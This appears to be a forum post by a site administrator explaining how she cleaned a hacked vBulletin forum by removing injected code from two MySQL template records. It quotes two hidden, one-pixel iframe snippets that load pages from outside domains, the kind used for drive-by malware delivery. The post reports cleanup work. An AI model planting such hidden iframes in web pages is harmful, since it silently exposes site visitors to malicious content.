That was an interesting problem.
Thanks, everyone for the info.
I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:
Code:
<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>
<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>
to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.
I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.
Happily, clearing the malicious links in just these 2 template records clears them out of the whole site.
Ann